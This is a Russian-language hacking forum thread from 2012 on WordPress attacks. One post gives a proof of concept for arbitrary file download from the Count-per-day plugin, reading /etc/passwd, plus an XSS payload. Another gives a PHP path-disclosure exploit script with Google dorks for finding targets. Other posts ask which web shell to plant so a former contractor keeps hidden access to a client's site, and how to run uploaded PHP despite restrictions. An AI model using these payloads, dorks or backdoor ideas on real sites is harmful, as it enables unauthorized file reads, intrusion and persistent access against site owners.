|
Новая партнёрка без шейва! Знакомства, Гости Вконтакте, Диеты и т.д.
Продвину Ваш сайт в ТОП. Робот WebEffector.
 |
|
XSS в плагине Count-per-day |
13.02.2012, 07:25
|
Постоянный
Регистрация: 10.06.2011
Сообщения: 590
Провел на форуме:
1 месяц 1 день
|
|
XSS в плагине Count-per-day
#Exploit Title: Count-per-day Wordpress plugin Arbitrary file download and XSS
#Version: < 3.1.1
#Software Link: http://wordpress.org/extend/plugins/count-per-day/
#Official fix: This advisory is released after the vendor has responded and fixed the issue.
#Description: User could call a remote script to download arbitrary file from the target system. Another script was vulnerable to non-persistent XSS
PoC for File download
192.168.0.1/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
PoC for XSS
192.168.0.1/wp-content/plugins/count-per-day/map/map.php?map='")); </script><img src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg>'
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
|
|
|
22.03.2012, 12:42
|
Новичок
Регистрация: 17.02.2010
Сообщения: 3
Провел на форуме:
2 часа 1 секунду
|
|
подскажите , хостинг стоит на CPanel движок WordPress доступ есть полный и на хостинг админом и в админ панель WordPress
что можно сделать или какой шелл залить что бы я всегда имел доступ и знал пароль в случае его смены ?
проблема не оплаты за работу создания сайта , доступ пока у меня есть ко всему абсолютно но думаю скоро сменят пароли
за советы буду благодарен !
|
|
|
|
02.04.2012, 21:36
|
Участник форума
Регистрация: 02.07.2010
Сообщения: 138
Провел на форуме:
5 дней 19 часов 33 минуты
|
|
Пагни, такое дело
Есть wordpress 3.3.1
Права на заливку - онли wp-upload
Залить пхп файл то я залил, но в этой дире он не выполнется.
Пытался залить туда .htaccess - безрезультатно.
Если нет прав на темплат, есть ещё способы?
upd: из плагинов стоят дискус и адсэнс, но в них походу ничего нет 
Последний раз редактировалось Mr.Snuffer, 02.04.2012 в 21:39.
|
|
|
|
08.04.2012, 20:11
|
Новичок
Регистрация: 27.07.2010
Сообщения: 10
Провел на форуме:
2 дня 1 час 11 минут
|
|
Раскрытие путей в thumb.php
в модуле flashservices
дорка:flashservices/services/thumb.php
|
|
|
|
10.04.2012, 23:21
|
Banned
Регистрация: 17.04.2011
Сообщения: 732
Провел на форуме:
2 недели 3 дня
|
|
Раскрытие путей в WordPress >= 3.31
На данный момент, самая новая версия 
Данная уязвимость присутствует во многих файлах из директории wp-includes, например, файл /wp-includes/admin-bar.php
Exploit (Exploit OsWpFp v.0.5):
PHP код:
<form method=GET>
<input type=text name=url>
<input type=submit value="Check URL">
</form>
<?php
$url = $_GET['url']; //URL Site
$site=$url.'/wp-includes/admin-bar.php';
$e = @file_get_contents($site);
if($e and $e !== "")
{
$a = array("<br />\n<b>Fatal error</b>: Call to undefined function add_action() in "," on line <b>39</b><br />","/wp-includes/admin-bar.php","<br />\n<b>Fatal error</b>: Call to undefined function add_action() in ","Fatal error: Call to undefined function add_action() in "," on line 39");
for($i=0; $i < count($a); ++$i)
{
$e = explode($a[$i],$e);
$e = implode("",$e);
}
echo "<hr size=1><span style=\"font-family: Calibri;\">Full path site <b>".$url."</b>:<br>".$e."<hr size=1>/*Exploit By Osstudio*/<br>\nICQ: 375647532</span>";
/*Exploit By Osstudio*/
}
else
{
echo "Ожидание ввода, либо не удалось использовать!";
}
?>
Веб версия эксплоита
Dork:
allinurl:.ru/wp-includes/admin-bar.php
allinurl:.com/wp-includes/admin-bar.php
(c) Osstudio
Последний раз редактировалось Osstudio, 10.04.2012 в 23:54.
|
|
|
|
16.04.2012, 15:17
|
Новичок
Регистрация: 25.01.2012
Сообщения: 8
Провел на форуме:
21 час 41 минуту 44 секунды
|
|
Сообщение от Osstudio
Раскрытие путей в WordPress >= 3.31
Exploit (Exploit OsWpFp v.0.5):
Расскажи новичку по подробнее как воспользоваться, если не трудно
|
|
|
|
16.04.2012, 15:20
|
Постоянный
Регистрация: 01.12.2011
Сообщения: 473
Провел на форуме:
3 недели 5 дней
|
|
Сообщение от fiin
Расскажи новичку по подробнее как воспользоваться, если не трудно
PHP интерпретатор нужен. Самое легкое, скачай Denwer и запускай.
|
|
|
|
16.04.2012, 15:25
|
Новичок
Регистрация: 25.01.2012
Сообщения: 8
Провел на форуме:
21 час 41 минуту 44 секунды
|
|
Сообщение от Ereee
PHP интерпретатор нужен. Самое легкое, скачай Denwer и запускай.
благодарю
|
|
|
|
16.04.2012, 17:07
|
Новичок
Регистрация: 25.01.2012
Сообщения: 8
Провел на форуме:
21 час 41 минуту 44 секунды
|
|
Подскажите, что я должен делать дальше? Что это мне даст |
|
|
|
16.04.2012, 17:08
|
Members of Antichat - Level 5
Регистрация: 15.03.2009
Сообщения: 758
Провел на форуме:
3 месяца 1 неделю 2 дня
|
|
Это тебе дает раскрытие путей, что позволяет узнать путь сервера , которые нужен в различных вариантов развития событий, но в твоем случае думаю ничего не дает
__________________
Уважаемые, в РОА только по приглашению, не стоит писать мне в ПМ "возьмите в РОА"
"На белом белом покрывале января, любимой девушке я имя написал, не прогоняй меня мороз,хочу побыть немного я , на белом белом покрывале января"
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей - 1 , гостей - 0)
|
|
Sergio09
|
| Опции темы |
Поиск в этой теме |
|
|
|
| Опции просмотра |
 Линейный вид
|
Powered by: vBulletin Version 3.0.x
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
|
Похожие темы
